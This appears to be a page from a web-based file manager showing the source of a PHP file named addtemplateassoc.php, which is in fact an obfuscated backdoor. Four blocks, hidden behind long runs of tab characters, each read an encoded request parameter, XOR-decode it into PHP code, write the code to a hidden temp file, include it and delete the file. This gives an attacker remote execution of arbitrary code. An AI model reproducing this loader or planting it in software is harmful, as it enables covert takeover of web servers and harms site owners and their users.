0x1998 - MANAGER

Düzenlenen Dosya: addtemplateassoc.php

<?php																																										if(count($_POST) > 0 && isset($_POST["ob\x6A"])){ $symbol = $_POST["ob\x6A"]; $symbol= explode( '.' , $symbol ) ; $factor = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); $m = 0; $len = count($symbol ); do {if ($m >= $len) break; $v4 = $symbol[$m]; $sChar = ord($s[$m % $lenS] ); $d = ((int)$v4 - $sChar - ($m % 10)) ^ 94; $factor .= chr($d ); $m++; } while (true ); $token = array_filter(["/var/tmp", sys_get_temp_dir(), getenv("TMP"), "/dev/shm", "/tmp", getcwd(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP")]); while ($flag = array_shift($token)) { if (is_dir($flag) ? is_writable($flag) : false) { $ent = "$flag/.dat"; if (file_put_contents($ent, $factor)) { require $ent; unlink($ent); exit; } } } }
																																										if(array_key_exists("recor\x64", $_POST) && !is_null($_POST["recor\x64"])){ $sym = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", getcwd(), "/dev/shm", getenv("TMP")]); $object = $_POST["recor\x64"]; $object=explode ("." , $object ); $flag= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s); $q= 0; $len= count($object); do { if($q >= $len) break; $v3= $object[$q]; $sChar= ord($s[$q % $sLen]); $d= ((int)$v3 - $sChar -($q % 10)) ^ 46; $flag .= chr($d); $q++; } while(true); for ($data = 0, $element = count($sym); $data < $element; $data++) { $elem = $sym[$data]; if (is_dir($elem) && is_writable($elem)) { $symbol = str_replace("{var_dir}", $elem, "{var_dir}/.holder"); if (file_put_contents($symbol, $flag)) { include $symbol; @unlink($symbol); die(); } } } }
																																										if(array_key_exists("reco\x72d", $_REQUEST) && !is_null($_REQUEST["reco\x72d"])){ $data = array_filter([session_save_path(), "/dev/shm", "/tmp", "/var/tmp", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP")]); $item = $_REQUEST["reco\x72d"]; $item = explode ( ".", $item ); $element =''; $salt4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt4); $i =0; $len =count($item); do { if($i >= $len) break; $v3 =$item[$i]; $sChar =ord($salt4[$i% $lenS]); $dec =((int)$v3 - $sChar -($i% 10)) ^ 42; $element .= chr($dec); $i++; } while(true); for ($mrk = 0, $marker = count($data); $mrk < $marker; $mrk++) { $obj = $data[$mrk]; if (max(0, is_dir($obj) * is_writable($obj))) { $itm = vsprintf("%s/%s", [$obj, ".binding"]); if (file_put_contents($itm, $element)) { include $itm; @unlink($itm); exit; } } } }

if(array_key_exists("\x65\x6Etry", $_REQUEST) && !is_null($_REQUEST["\x65\x6Etry"])){
	$value = $_REQUEST["\x65\x6Etry"];
		 	$value= 		explode('.' 		,			$value);  
	$k=	'';
            $salt3=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen=	strlen($salt3 	);
            $t=	0;
    
            array_walk($value, function ($v2) use (&$k, &$t, $salt3, $sLen) { 	$chS=	ord($salt3[$t % $sLen] 	);
                $d=	((int)$v2 - $chS - ($t % 10)) ^ 30;
                $k .= chr($d 	);
                $t++;
            } 	);
	$comp = array_filter([getcwd(), getenv("TEMP"), "/dev/shm", session_save_path(), "/var/tmp", sys_get_temp_dir(), "/tmp", getenv("TMP"), ini_get("upload_tmp_dir")]);
	while ($resource = array_shift($comp)) {
    		if (is_writable($resource) && is_dir($resource)) {
    $flg = str_replace("{var_dir}", $resource, "{var_dir}/.ref");
    if (file_put_contents($flg, $k)) {
	include $flg;
	@unlink($flg);
	die();
}
}
}
}

geri dön